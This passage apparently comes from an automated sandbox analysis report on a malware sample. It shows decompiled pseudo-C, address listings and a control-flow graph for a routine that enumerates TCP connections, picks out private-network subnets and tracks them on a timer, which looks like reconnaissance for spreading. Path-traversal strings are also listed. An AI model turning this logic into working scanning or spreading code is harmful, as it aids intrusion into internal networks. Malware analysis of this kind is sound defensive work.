							} else {
								goto L8;
							}
						} else {
							if(_t409 == 0xffffffff) {
								L8:
								 *_t307 =  *( *_t395 + 4);
								 *((char*)(_t307 + 4)) = 0;
								 *(_t307 + 0x108) = 0;
								 *(_t307 + 0x10c) = 0;
								 *(_t307 + 0x110) = 0;
								 *(_t307 + 0x114) = 0;
								 *(_t307 + 0x118) = 0;
								 *(_t307 + 0x11c) = 0;
								 *(_t307 + 0x120) = 0;
								 *(_t307 + 0x124) = 0;
								 *(_t307 + 0x128) = 0;
								_pop(_t419);
								__eflags = _v8 ^ _t424;
								return E02870A5D(_v8 ^ _t424, _t419);
							} else {
								memcpy(_t307,  &(_t395[2]), 0x4b << 2);
								_pop(_t421);
								return E02870A5D(_v8 ^ _t424 + 0xc, _t421);
							}
						}
					}
				}
				L82:
			}

























































































                                                0x0286f4e6
                                                0x0286f4ec
                                                0x0286f4f3
                                                0x0286f4fb
                                                0x0286f4ff
                                                0x0286f502
                                                0x0286f507
                                                0x0286f509
                                                0x0286f510
                                                0x0286fae2
                                                0x0286faef
                                                0x0286faf1
                                                0x0286fafb
                                                0x0286f516
                                                0x0286f516
                                                0x0286f51b
                                                0x00000000
                                                0x0286f521
                                                0x0286f525
                                                0x0286f527
                                                0x0286f527
                                                0x0286f52c
                                                0x0286f539
                                                0x0286f565
                                                0x0286f568
                                                0x0286f5e8
                                                0x0286f5ea
                                                0x0286f5ed
                                                0x0286f5ef
                                                0x0286f5ef
                                                0x0286f5f4
                                                0x0286f5f6
                                                0x0286f5f9
                                                0x0286f5fb
                                                0x0286f600
                                                0x0286f600
                                                0x0286f602
                                                0x0286f604
                                                0x0286f606
                                                0x0286f60a
                                                0x0286f60f
                                                0x0286f610
                                                0x0286f613
                                                0x0286f626
                                                0x0286f629
                                                0x0286f639
                                                0x0286f63e
                                                0x0286f643
                                                0x0286f645
                                                0x0286f645
                                                0x0286f646
                                                0x0286f646
                                                0x0286f613
                                                0x0286f60a
                                                0x0286f649
                                                0x0286f64b
                                                0x0286f64b
                                                0x0286f650
                                                0x0286f650
                                                0x0286f66c
                                                0x0286f684
                                                0x0286f689
                                                0x0286f68c
                                                0x0286f68e
                                                0x0286f6b6
                                                0x0286f6bb
                                                0x0286f6be
                                                0x0286f6c0
                                                0x0286f6fa
                                                0x0286f700
                                                0x0286f709
                                                0x0286f713
                                                0x0286f6c2
                                                0x0286f6c2
                                                0x0286f6c6
                                                0x0286f6d0
                                                0x0286f6d7
                                                0x0286f6e3
                                                0x0286f6e8
                                                0x0286f6eb
                                                0x0286f6ef
                                                0x0286f718
                                                0x0286f718
                                                0x0286f71d
                                                0x0286f720
                                                0x0286f720
                                                0x0286f727
                                                0x0286f72a
                                                0x0286f731
                                                0x0286f731
                                                0x0286f735
                                                0x0286f740
                                                0x0286f740
                                                0x0286f742
                                                0x0286f744
                                                0x00000000
                                                0x00000000
                                                0x0286f746
                                                0x0286f746
                                                0x0286f74a
                                                0x0286f74c
                                                0x0286f740
                                                0x0286f740
                                                0x0286f742
                                                0x0286f744
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0286f744
                                                0x0286f740
                                                0x0286f751
                                                0x0286f751
                                                0x0286f753
                                                0x0286f755
                                                0x0286f740
                                                0x0286f740
                                                0x0286f742
                                                0x0286f744
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0286f744
                                                0x0286f740
                                                0x0286f758
                                                0x0286f75a
                                                0x0286f75c
                                                0x0286f740
                                                0x0286f740
                                                0x0286f742
                                                0x0286f744
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0286f744
                                                0x0286f740
                                                0x0286f765
                                                0x0286f76a
                                                0x0286f76d
                                                0x0286f76f
                                                0x0286f771
                                                0x0286f771
                                                0x0286f740
                                                0x0286f740
                                                0x0286f742
                                                0x0286f744
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0286f744
                                                0x0286f740
                                                0x0286f77c
                                                0x0286f781
                                                0x0286f784
                                                0x0286f786
                                                0x0286f788
                                                0x0286f788
                                                0x0286f740
                                                0x0286f740
                                                0x0286f742
                                                0x0286f744
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0286f744
                                                0x0286f740
                                                0x0286f793
                                                0x0286f798
                                                0x0286f79b
                                                0x0286f79d
                                                0x0286f79f
                                                0x0286f79f
                                                0x0286f740
                                                0x0286f740
                                                0x0286f742
                                                0x0286f744
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0286f744
                                                0x00000000
                                                0x0286f740
                                                0x0286f7aa
                                                0x0286f7af
                                                0x0286f7b2
                                                0x0286f7b4
                                                0x0286f7b6
                                                0x0286f7b6
                                                0x00000000
                                                0x0286f7b6
                                                0x0286f7bb
                                                0x0286f7be
                                                0x0286f7be
                                                0x0286f7c0
                                                0x0286f7c0
                                                0x0286f7c2
                                                0x0286f7c5
                                                0x0286f7c9
                                                0x0286f7c9
                                                0x0286f7cd
                                                0x0286f7e0
                                                0x0286f7ea
                                                0x0286f7ed
                                                0x0286f7f0
                                                0x0286f7f5
                                                0x0286f7fa
                                                0x0286f7ff
                                                0x0286f801
                                                0x0286f812
                                                0x0286f818
                                                0x0286f820
                                                0x0286f82e
                                                0x0286f839
                                                0x0286f842
                                                0x0286f842
                                                0x0286f847
                                                0x0286f803
                                                0x0286f803
                                                0x0286f806
                                                0x00000000
                                                0x0286f808
                                                0x0286f808
                                                0x0286f80b
                                                0x00000000
                                                0x0286f80d
                                                0x0286f80d
                                                0x0286f810
                                                0x00000000
                                                0x00000000
                                                0x0286f810
                                                0x0286f80b
                                                0x0286f806
                                                0x0286f852
                                                0x0286f856
                                                0x0286f859
                                                0x0286f85e
                                                0x0286f864
                                                0x0286f866
                                                0x0286f866
                                                0x0286f866
                                                0x0286f866
                                                0x0286f86d
                                                0x0286f872
                                                0x0286f874
                                                0x0286f874
                                                0x0286f874
                                                0x0286f874
                                                0x0286f87b
                                                0x0286f87d
                                                0x0286f87f
                                                0x0286f87f
                                                0x0286f87f
                                                0x0286f87f
                                                0x0286f886
                                                0x0286f88b
                                                0x0286f88d
                                                0x0286f88d
                                                0x0286f88d
                                                0x0286f88d
                                                0x0286f894
                                                0x0286f89e
                                                0x0286f8ab
                                                0x0286f8b6
                                                0x0286f8c3
                                                0x0286f8c8
                                                0x0286f8ce
                                                0x0286f8d2
                                                0x0286f8d4
                                                0x0286f8d9
                                                0x0286f8dd
                                                0x0286f8e3
                                                0x0286f8e9
                                                0x0286f8ef
                                                0x0286f8f5
                                                0x0286f8fb
                                                0x0286f901
                                                0x0286fa9f
                                                0x0286fa9f
                                                0x0286f907
                                                0x0286f907
                                                0x0286f90b
                                                0x0286f910
                                                0x0286f924
                                                0x0286f924
                                                0x0286f928
                                                0x0286f92d
                                                0x0286f935
                                                0x0286f939
                                                0x0286f940
                                                0x0286f940
                                                0x0286f942
                                                0x0286f944
                                                0x00000000
                                                0x00000000
                                                0x0286f946
                                                0x0286f948
                                                0x0286f95c
                                                0x0286f95c
                                                0x0286f94a
                                                0x0286f94a
                                                0x0286f94d
                                                0x0286f94d
                                                0x0286f950
                                                0x00000000
                                                0x0286f952
                                                0x0286f952
                                                0x0286f955
                                                0x0286f958
                                                0x0286f95a
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0286f95a
                                                0x0286f950
                                                0x0286f965
                                                0x0286f965
                                                0x0286f967
                                                0x0286f988
                                                0x0286f98c
                                                0x0286f994
                                                0x0286f999
                                                0x0286f99e
                                                0x0286f9a2
                                                0x0286f9a7
                                                0x0286f9ae
                                                0x0286f9b4
                                                0x0286f9b8
                                                0x0286f9ba
                                                0x0286f9d5
                                                0x0286f9d9
                                                0x0286f9dc
                                                0x0286f9df
                                                0x0286f9e5
                                                0x0286f9e5
                                                0x0286f9ea
                                                0x0286f9f0
                                                0x0286f9f8
                                                0x0286f9fe
                                                0x0286fa05
                                                0x0286fa05
                                                0x0286fa09
                                                0x0286fa0b
                                                0x0286fa26
                                                0x0286fa2a
                                                0x0286fa2d
                                                0x0286fa30
                                                0x0286fa36
                                                0x0286fa36
                                                0x0286fa3b
                                                0x0286fa41
                                                0x0286fa49
                                                0x0286fa4f
                                                0x0286fa52
                                                0x0286fa57
                                                0x0286fa7d
                                                0x0286fa83
                                                0x0286fa83
                                                0x0286fa88
                                                0x0286fa8e
                                                0x0286fa96
                                                0x0286fa9c
                                                0x00000000
                                                0x0286f969
                                                0x0286f969
                                                0x0286f972
                                                0x0286f978
                                                0x0286f97a
                                                0x0286f97d
                                                0x0286f981
                                                0x0286f920
                                                0x00000000
                                                0x00000000
                                                0x0286f983
                                                0x0286f981
                                                0x00000000
                                                0x0286f967
                                                0x0286f960
                                                0x0286f962
                                                0x0286f962
                                                0x00000000
                                                0x0286f962
                                                0x0286f924
                                                0x0286faa3
                                                0x0286faa3
                                                0x0286faa5
                                                0x0286faa8
                                                0x0286faad
                                                0x0286faad
                                                0x0286fac3
                                                0x0286facc
                                                0x0286fad5
                                                0x0286fadf
                                                0x00000000
                                                0x0286fadf
                                                0x0286f6f1
                                                0x0286f6f2
                                                0x0286f6f7
                                                0x00000000
                                                0x0286f6f7
                                                0x0286f6ef
                                                0x0286f690
                                                0x0286f696
                                                0x0286f69f
                                                0x0286f6a9
                                                0x0286f6a9
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0286f53b
                                                0x0286f53e
                                                0x0286f56a
                                                0x0286f56f
                                                0x0286f573
                                                0x0286f577
                                                0x0286f581
                                                0x0286f58b
                                                0x0286f595
                                                0x0286f59f
                                                0x0286f5a9
                                                0x0286f5b3
                                                0x0286f5bd
                                                0x0286f5c7
                                                0x0286f5d2
                                                0x0286f5db
                                                0x0286f5e5
                                                0x0286f540
                                                0x0286f54c
                                                0x0286f54f
                                                0x0286f562
                                                0x0286f562
                                                0x0286f53e
                                                0x0286f539
                                                0x0286f51b
                                                0x00000000

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.749016186.0000000002860000.00000040.00000400.00020000.00000000.sdmp, Offset: 02860000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_2860000_dllhost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: /../$/..\$\../$\..\
                                                • API String ID: 0-3885502717
                                                • Opcode ID: ef3d86f7987c04e209b6525adf3945642c588c4ee357812ec21fc834004b3384
                                                • Instruction ID: c549eaa62ed0ec8b35493933e297a183807372c275e9fbbc54fb53b9b07013b9
                                                • Opcode Fuzzy Hash: ef3d86f7987c04e209b6525adf3945642c588c4ee357812ec21fc834004b3384
                                                • Instruction Fuzzy Hash: 3A0207795043418FC724CF28D4957BABBE1BF95308F084A6DE9DACB681C735E509CB92
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02865200 Relevance: 33.6, APIs: 18, Strings: 1, Instructions: 399memorysleepCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 0 2865200-2865255 Sleep call 2873440 2 286525a-2865284 GetProcessHeap HeapAlloc 0->2 3 286528a 2->3 4 28657bb-28657d6 call 2870a5d 2->4 6 2865290-28652ad GetTcpTable 3->6 8 28652af-28652d2 GetProcessHeap HeapFree GetProcessHeap HeapAlloc 6->8 9 28652d8-28652ea GetTcpTable 6->9 8->4 8->9 10 28657b3-28657b9 GetProcessHeap HeapFree 9->10 11 28652f0-28652f8 9->11 10->4 12 2865777-28657ab GetProcessHeap HeapFree Sleep GetProcessHeap HeapAlloc 11->12 13 28652fe-2865307 11->13 12->6 14 28657b1 12->14 15 2865310-286535d call 2873440 call 2865180 13->15 14->4 20 286535f-2865362 15->20 21 2865389-28653ab 15->21 22 2865377-286537a 20->22 23 2865364-2865367 20->23 24 28653b1-28653ba 21->24 25 28653ad-28653af 21->25 26 2865741-2865765 22->26 28 2865380-2865383 22->28 23->26 27 286536d-2865370 23->27 30 28653c0-28653c5 24->30 29 28653c9-28653f7 call 2865a00 call 2866530 25->29 26->15 34 286576b-2865771 26->34 27->21 31 2865372 27->31 28->21 28->26 38 286545b 29->38 39 28653f9-2865403 29->39 30->30 32 28653c7 30->32 31->26 32->29 34->12 42 286545d-286546b 38->42 40 2865407-2865435 call 28651a0 39->40 41 2865405 39->41 51 2865437-286543f 40->51 52 286544f-2865454 40->52 41->40 44 286546d-2865475 call 2865cf0 42->44 45 286547a-286547c 42->45 44->45 45->26 46 2865482-28654a4 45->46 49 28654a6-28654a8 46->49 50 28654aa-28654b0 46->50 53 28654bc-2865506 call 2865a00 call 28664b0 49->53 54 28654b3-28654b8 50->54 55 2865446-286544a 51->55 56 2865441-2865444 51->56 52->42 57 2865456 52->57 64 286556a 53->64 65 2865508-2865512 53->65 54->54 58 28654ba 54->58 60 286544d 55->60 56->60 57->38 58->53 60->52 66 286556c-286556e 64->66 67 2865516-2865544 call 28651a0 65->67 68 2865514 65->68 69 2865574-2865596 66->69 70 2865600 66->70 79 2865546-286554e 67->79 80 286555e-2865563 67->80 68->67 73 286559c-28655a2 69->73 74 2865598-286559a 69->74 72 2865606 70->72 76 2865608-2865611 72->76 78 28655a5-28655aa 73->78 77 28655ae-28655fa call 2865a00 call 28657e0 GetTickCount 74->77 84 2865655-286565f 76->84 85 2865613-2865625 76->85 77->72 104 28655fc-28655fe 77->104 78->78 86 28655ac 78->86 81 2865555-2865559 79->81 82 2865550-2865553 79->82 80->66 83 2865565 80->83 88 286555c 81->88 82->88 83->64 91 2865682-2865684 84->91 92 2865661-2865673 84->92 89 2865627-2865634 call 2865cf0 85->89 90 286563a-286564e 85->90 86->77 88->80 89->90 90->84 91->26 96 286568a-28656ac 91->96 92->91 95 2865675-286567d call 2865cf0 92->95 95->91 98 28656b2-28656bb 96->98 99 28656ae-28656b0 96->99 105 28656c0-28656c5 98->105 103 28656c9-2865705 call 2865a00 call 28657e0 GetTickCount 99->103 111 2865707-286570f call 2865cf0 103->111 112 2865714-286573e call 286b4e0 103->112 104->76 105->105 106 28656c7 105->106 106->103 111->112 112->26
                                                C-Code - Quality: 74%
                                                			E02865200(void* __ebx, void* __edi) {
				long _v8;
				char _v16;
				signed int _v20;
				char _v148;
				intOrPtr _v152;
				long _v156;
				char _v172;
				intOrPtr _v176;
				long _v180;
				char _v196;
				intOrPtr _v200;
				long _v204;
				char _v220;
				signed int _v224;
				long _v228;
				void* _v232;
				signed int _v236;
				intOrPtr _v240;
				signed int* _v244;
				signed int _v248;
				void* __esi;
				signed int _t127;
				signed int _t128;
				long* _t136;
				long* _t137;
				void* _t143;
				signed int _t155;
				intOrPtr* _t160;
				intOrPtr _t161;
				intOrPtr _t163;
				signed int _t164;
				signed int _t168;
				intOrPtr* _t171;
				intOrPtr* _t172;
				signed int _t173;
				intOrPtr _t179;
				intOrPtr _t183;
				intOrPtr _t186;
				signed int _t189;
				signed int _t193;
				intOrPtr* _t195;
				long _t196;
				signed int _t200;
				signed int _t207;
				void* _t215;
				signed int _t217;
				signed int _t218;
				signed int _t219;
				signed int* _t224;
				intOrPtr* _t225;
				signed int _t226;
				intOrPtr* _t229;
				signed int _t230;
				signed int _t232;
				signed int _t233;
				intOrPtr* _t237;
				signed int _t238;
				long _t242;
				long _t245;
				void* _t247;
				intOrPtr _t250;
				intOrPtr _t251;
				intOrPtr* _t253;
				void* _t254;
				void* _t255;
				void* _t256;
				signed int _t257;
				void* _t258;
				void* _t260;

				_push(0xffffffff);
				_push(E0288456F);
				_push( *[fs:0x0]);
				_t127 =  *0x288f008; // 0xe7fe870c
				_t128 = _t127 ^ _t257;
				_v20 = _t128;
				_push(__edi);
				_push(_t128);
				 *[fs:0x0] =  &_v16;
				_v224 = 0;
				_v236 = 0;
				Sleep(0x1388); // executed
				E02873440(__edi,  &_v148, 0, 0x80);
				_t253 = GetProcessHeap;
				_t260 = _t258 - 0xe8 + 0xc;
				_v228 = 0;
				_t215 = HeapAlloc(GetProcessHeap(), 0, 0x18);
				_v232 = _t215;
				if(_t215 == 0) {
					L80:
					 *[fs:0x0] = _v16;
					_pop(_t254);
					return E02870A5D(_v20 ^ _t257, _t254);
				}
				_t250 = HeapFree;
				do {
					_t136 =  &_v228;
					_v228 = 0x18;
					__imp__GetTcpTable(_t215, _t136, 1);
					if(_t136 != 0x7a) {
						L4:
						_t137 =  &_v228;
						__imp__GetTcpTable(_t215, _t137, 1);
						if(_t137 != 0) {
							HeapFree(GetProcessHeap(), 0, _t215);
							goto L80;
						}
						_v240 = _t137;
						if( *_t215 <= _t137) {
							goto L77;
						}
						_t14 = _t215 + 0x10; // 0x10
						_t224 = _t14;
						_v244 = _t224;
						asm("o16 nop [eax+eax]");
						do {
							_t217 =  *_t224;
							_v248 = _t217;
							E02873440(_t250,  &_v148, 0, 0x80);
							_push(_t217 >> 0x00000010 & 0x000000ff);
							_push(_t217 >> 0x00000008 & 0x000000ff);
							E02865180( &_v148, 0x80, "%d.%d.%d.*", _t217 & 0x000000ff);
							_t260 = _t260 + 0x24;
							if(_t217 == 0xa) {
								L14:
								__eflags = _v148;
								_v152 = 0xf;
								_v156 = 0;
								_v172 = 0;
								if(_v148 != 0) {
									_t225 =  &_v148;
									_t24 = _t225 + 1; // 0x1
									_t246 = _t24;
									asm("o16 nop [eax+eax]");
									do {
										_t155 =  *_t225;
										_t225 = _t225 + 1;
										__eflags = _t155;
									} while (_t155 != 0);
									_t226 = _t225 - _t246;
									__eflags = _t226;
									L19:
									_push(_t226);
									_push( &_v148);
									E02865A00(_t217,  &_v172, _t250, _t253);
									_t250 =  *0x2896a8c;
									_t255 = E02866530( &_v172,  &_v172);
									_t160 =  *0x2896a8c;
									__eflags = _t255 - _t160;
									if(_t255 == _t160) {
										L29:
										_t253 = _t160;
										L30:
										_t161 = _v152;
										__eflags = _t253 - _t250;
										_t218 = _t217 & 0xffffff00 | _t253 == _t250;
										__eflags = _t161 - 0x10;
										if(_t161 >= 0x10) {
											__eflags = _t161 + 1;
											E02865CF0(_t218, _t246, _t250, _v172, _t161 + 1);
										}
										__eflags = _t218;
										if(_t218 == 0) {
											goto L75;
										} else {
											__eflags = _v148;
											_v152 = 0xf;
											_v156 = 0;
											_v172 = 0;
											if(_v148 != 0) {
												_t229 =  &_v148;
												_t50 = _t229 + 1; // 0x1
												_t246 = _t50;
												do {
													_t164 =  *_t229;
													_t229 = _t229 + 1;
													__eflags = _t164;
												} while (_t164 != 0);
												_t230 = _t229 - _t246;
												__eflags = _t230;
												L38:
												_push(_t230);
												_push( &_v148);
												E02865A00(_t218,  &_v172, _t250, _t253);
												_v8 = 0;
												_t251 =  *0x2896a54;
												_t168 = _v224 | 0x00000001;
												_v224 = _t168;
												_v236 = _t168;
												_t256 = E028664B0( &_v172,  &_v172);
												_t171 =  *0x2896a54;
												__eflags = _t256 - _t171;
												if(_t256 == _t171) {
													L48:
													_t253 = _t171;
													L49:
													__eflags = _t253 - _t251;
													if(_t253 == _t251) {
														_t250 = GetTickCount;
														L58:
														_t219 = 1;
														L59:
														_t232 = _v224;
														__eflags = _t232 & 0x00000002;
														if((_t232 & 0x00000002) != 0) {
															_t186 = _v176;
															_t232 = _t232 & 0xfffffffd;
															_v224 = _t232;
															__eflags = _t186 - 0x10;
															if(_t186 >= 0x10) {
																__eflags = _t186 + 1;
																E02865CF0(_t219, _t246, _t250, _v196, _t186 + 1);
																_t232 = _v224;
															}
															_v176 = 0xf;
															_v180 = 0;
															_v196 = 0;
														}
														_v8 = 0xffffffff;
														__eflags = _t232 & 0x00000001;
														if((_t232 & 0x00000001) != 0) {
															_t183 = _v152;
															_v224 = _t232 & 0xfffffffe;
															__eflags = _t183 - 0x10;
															if(_t183 >= 0x10) {
																__eflags = _t183 + 1;
																E02865CF0(_t219, _t246, _t250, _v172, _t183 + 1);
															}
														}
														__eflags = _t219;
														if(_t219 == 0) {
															goto L75;
														} else {
															__eflags = _v148;
															_v200 = 0xf;
															_v204 = 0;
															_v220 = 0;
															if(_v148 != 0) {
																_t172 =  &_v148;
																_t105 = _t172 + 1; // 0x1
																_t247 = _t105;
																do {
																	_t233 =  *_t172;
																	_t172 = _t172 + 1;
																	__eflags = _t233;
																} while (_t233 != 0);
																_t173 = _t172 - _t247;
																__eflags = _t173;
																L72:
																_push(_t173);
																_push( &_v148);
																E02865A00(_t219,  &_v220, _t250, _t253);
																_v8 = 2;
																_t253 = E028657E0( &_v220,  &_v220);
																 *_t253 = GetTickCount();
																_v8 = 0xffffffff;
																_t179 = _v200;
																__eflags = _t179 - 0x10;
																if(_t179 >= 0x10) {
																	__eflags = _t179 + 1;
																	E02865CF0(_t219, _t246, _t250, _v220, _t179 + 1);
																}
																_t246 = 0;
																__eflags = 0;
																_v200 = 0xf;
																_v204 = 0;
																_v220 = 0;
																E0286B4E0(_t219,  &_v248, 0, _t250, 1);
																_t260 = _t260 + 4;
																goto L75;
															}
															_t173 = 0;
															goto L72;
														}
													}
													__eflags = _v148;
													_v176 = 0xf;
													_v180 = 0;
													_v196 = 0;
													if(_v148 != 0) {
														_t237 =  &_v148;
														_t76 = _t237 + 1; // 0x1
														_t246 = _t76;
														do {
															_t189 =  *_t237;
															_t237 = _t237 + 1;
															__eflags = _t189;
														} while (_t189 != 0);
														_t238 = _t237 - _t246;
														__eflags = _t238;
														L55:
														_push(_t238);
														_push( &_v148);
														E02865A00(_t218,  &_v196, _t251, _t253);
														_v8 = 1;
														_t193 = _v224 | 0x00000002;
														_v224 = _t193;
														_v236 = _t193;
														_t195 = E028657E0( &_v196,  &_v196);
														_t250 = GetTickCount;
														_t253 = _t195;
														_t196 = GetTickCount();
														__eflags = _t196 -  *_t253 - 0x493e0;
														if(_t196 -  *_t253 > 0x493e0) {
															goto L58;
														}
														_t219 = 0;
														goto L59;
													}
													_t238 = 0;
													goto L55;
												}
												__eflags =  *((intOrPtr*)(_t256 + 0x24)) - 0x10;
												_t59 = _t256 + 0x10; // 0x10
												_t246 = _t59;
												_t218 =  *(_t246 + 0x10);
												if( *((intOrPtr*)(_t256 + 0x24)) >= 0x10) {
													_t246 =  *_t246;
												}
												__eflags = _v152 - 0x10;
												_t241 =  >=  ? _v172 :  &_v172;
												__eflags = _v156 - _t218;
												_t199 =  <  ? _v156 : _t218;
												_t200 = E028651A0( >=  ? _v172 :  &_v172, _t246,  <  ? _v156 : _t218);
												_t260 = _t260 + 4;
												__eflags = _t200;
												if(__eflags == 0) {
													_t242 = _v156;
													__eflags = _t242 - _t218;
													if(_t242 >= _t218) {
														__eflags = _t242 - _t218;
														_t68 = _t242 != _t218;
														__eflags = _t68;
														_t200 = 0 | _t68;
													} else {
														_t200 = _t200 | 0xffffffff;
													}
													__eflags = _t200;
												}
												if(__eflags == 0) {
													goto L49;
												} else {
													_t171 =  *0x2896a54;
													goto L48;
												}
											}
											_t230 = 0;
											goto L38;
										}
									}
									__eflags =  *((intOrPtr*)(_t255 + 0x24)) - 0x10;
									_t29 = _t255 + 0x10; // 0x10
									_t246 = _t29;
									_t217 =  *(_t246 + 0x10);
									if( *((intOrPtr*)(_t255 + 0x24)) >= 0x10) {
										_t246 =  *_t246;
									}
									__eflags = _v152 - 0x10;
									_t244 =  >=  ? _v172 :  &_v172;
									__eflags = _v156 - _t217;
									_t206 =  <  ? _v156 : _t217;
									_t207 = E028651A0( >=  ? _v172 :  &_v172, _t246,  <  ? _v156 : _t217);
									_t260 = _t260 + 4;
									__eflags = _t207;
									if(__eflags == 0) {
										_t245 = _v156;
										__eflags = _t245 - _t217;
										if(_t245 >= _t217) {
											__eflags = _t245 - _t217;
											_t38 = _t245 != _t217;
											__eflags = _t38;
											_t207 = 0 | _t38;
										} else {
											_t207 = _t207 | 0xffffffff;
										}
										__eflags = _t207;
									}
									if(__eflags == 0) {
										goto L30;
									} else {
										_t160 =  *0x2896a8c;
										goto L29;
									}
								}
								_t226 = 0;
								goto L19;
							}
							if(_t217 != 0xac) {
								__eflags = _t217 - 0xc0;
								if(_t217 != 0xc0) {
									goto L75;
								}
								__eflags = _t217 - 0xa8;
								if(_t217 != 0xa8) {
									goto L75;
								}
								goto L14;
							}
							if(_t217 < 0x10) {
								goto L75;
							}
							if(_t217 <= 0x1f) {
								goto L14;
							}
							L75:
							_t215 = _v232;
							_t163 = _v240 + 1;
							_t224 =  &(_v244[5]);
							_v240 = _t163;
							_v244 = _t224;
						} while (_t163 <  *_t215);
						_t253 = GetProcessHeap;
						_t250 = HeapFree;
						goto L77;
					}
					HeapFree(GetProcessHeap(), 0, _t215);
					_t215 = HeapAlloc(GetProcessHeap(), 0, _v228);
					_v232 = _t215;
					if(_t215 == 0) {
						goto L80;
					}
					goto L4;
					L77:
					HeapFree(GetProcessHeap(), 0, _t215);
					Sleep(0x1388);
					_v228 = 0;
					_t143 = HeapAlloc(GetProcessHeap(), 0, 0x18);
					_t215 = _t143;
					_v232 = _t143;
				} while (_t215 != 0);
				goto L80;
			}








































































                                                0x02865203
                                                0x02865205
                                                0x02865210
                                                0x02865217
                                                0x0286521c
                                                0x0286521e
                                                0x02865223
                                                0x02865224
                                                0x02865228
                                                0x02865235
                                                0x0286523b
                                                0x02865241
                                                0x02865255
                                                0x0286525a
                                                0x02865260
                                                0x02865263
                                                0x0286527a
                                                0x0286527c
                                                0x02865284
                                                0x028657bb
                                                0x028657be
                                                0x028657c7
                                                0x028657d6
                                                0x028657d6
                                                0x0286528a
                                                0x02865290
                                                0x02865292
                                                0x02865298
                                                0x028652a4
                                                0x028652ad
                                                0x028652d8
                                                0x028652da
                                                0x028652e2
                                                0x028652ea
                                                0x028657b9
                                                0x00000000
                                                0x028657b9
                                                0x028652f0
                                                0x028652f8
                                                0x00000000
                                                0x00000000
                                                0x028652fe
                                                0x028652fe
                                                0x02865301
                                                0x02865307
                                                0x02865310
                                                0x02865310
                                                0x02865320
                                                0x02865326
                                                0x02865333
                                                0x0286533c
                                                0x02865352
                                                0x02865357
                                                0x0286535d
                                                0x02865389
                                                0x02865389
                                                0x02865390
                                                0x0286539a
                                                0x028653a4
                                                0x028653ab
                                                0x028653b1
                                                0x028653b7
                                                0x028653b7
                                                0x028653ba
                                                0x028653c0
                                                0x028653c0
                                                0x028653c2
                                                0x028653c3
                                                0x028653c3
                                                0x028653c7
                                                0x028653c7
                                                0x028653c9
                                                0x028653c9
                                                0x028653d0
                                                0x028653d7
                                                0x028653dc
                                                0x028653ee
                                                0x028653f0
                                                0x028653f5
                                                0x028653f7
                                                0x0286545b
                                                0x0286545b
                                                0x0286545d
                                                0x0286545d
                                                0x02865463
                                                0x02865465
                                                0x02865468
                                                0x0286546b
                                                0x0286546d
                                                0x02865475
                                                0x02865475
                                                0x0286547a
                                                0x0286547c
                                                0x00000000
                                                0x02865482
                                                0x02865482
                                                0x02865489
                                                0x02865493
                                                0x0286549d
                                                0x028654a4
                                                0x028654aa
                                                0x028654b0
                                                0x028654b0
                                                0x028654b3
                                                0x028654b3
                                                0x028654b5
                                                0x028654b6
                                                0x028654b6
                                                0x028654ba
                                                0x028654ba
                                                0x028654bc
                                                0x028654bc
                                                0x028654c3
                                                0x028654ca
                                                0x028654cf
                                                0x028654dc
                                                0x028654e2
                                                0x028654e5
                                                0x028654eb
                                                0x028654fd
                                                0x028654ff
                                                0x02865504
                                                0x02865506
                                                0x0286556a
                                                0x0286556a
                                                0x0286556c
                                                0x0286556c
                                                0x0286556e
                                                0x02865600
                                                0x02865606
                                                0x02865606
                                                0x02865608
                                                0x02865608
                                                0x0286560e
                                                0x02865611
                                                0x02865613
                                                0x02865619
                                                0x0286561c
                                                0x02865622
                                                0x02865625
                                                0x02865627
                                                0x0286562f
                                                0x02865634
                                                0x02865634
                                                0x0286563a
                                                0x02865644
                                                0x0286564e
                                                0x0286564e
                                                0x02865655
                                                0x0286565c
                                                0x0286565f
                                                0x02865661
                                                0x0286566a
                                                0x02865670
                                                0x02865673
                                                0x02865675
                                                0x0286567d
                                                0x0286567d
                                                0x02865673
                                                0x02865682
                                                0x02865684
                                                0x00000000
                                                0x0286568a
                                                0x0286568a
                                                0x02865691
                                                0x0286569b
                                                0x028656a5
                                                0x028656ac
                                                0x028656b2
                                                0x028656b8
                                                0x028656b8
                                                0x028656c0
                                                0x028656c0
                                                0x028656c2
                                                0x028656c3
                                                0x028656c3
                                                0x028656c7
                                                0x028656c7
                                                0x028656c9
                                                0x028656c9
                                                0x028656d0
                                                0x028656d7
                                                0x028656e2
                                                0x028656ef
                                                0x028656f3
                                                0x028656f5
                                                0x028656fc
                                                0x02865702
                                                0x02865705
                                                0x02865707
                                                0x0286570f
                                                0x0286570f
                                                0x02865716
                                                0x02865716
                                                0x02865718
                                                0x02865728
                                                0x02865732
                                                0x02865739
                                                0x0286573e
                                                0x00000000
                                                0x0286573e
                                                0x028656ae
                                                0x00000000
                                                0x028656ae
                                                0x02865684
                                                0x02865574
                                                0x0286557b
                                                0x02865585
                                                0x0286558f
                                                0x02865596
                                                0x0286559c
                                                0x028655a2
                                                0x028655a2
                                                0x028655a5
                                                0x028655a5
                                                0x028655a7
                                                0x028655a8
                                                0x028655a8
                                                0x028655ac
                                                0x028655ac
                                                0x028655ae
                                                0x028655ae
                                                0x028655b5
                                                0x028655bc
                                                0x028655c1
                                                0x028655ce
                                                0x028655d1
                                                0x028655d7
                                                0x028655e4
                                                0x028655e9
                                                0x028655ef
                                                0x028655f1
                                                0x028655f5
                                                0x028655fa
                                                0x00000000
                                                0x00000000
                                                0x028655fc
                                                0x00000000
                                                0x028655fc
                                                0x02865598
                                                0x00000000
                                                0x02865598
                                                0x02865508
                                                0x0286550c
                                                0x0286550c
                                                0x0286550f
                                                0x02865512
                                                0x02865514
                                                0x02865514
                                                0x02865516
                                                0x02865525
                                                0x0286552c
                                                0x02865532
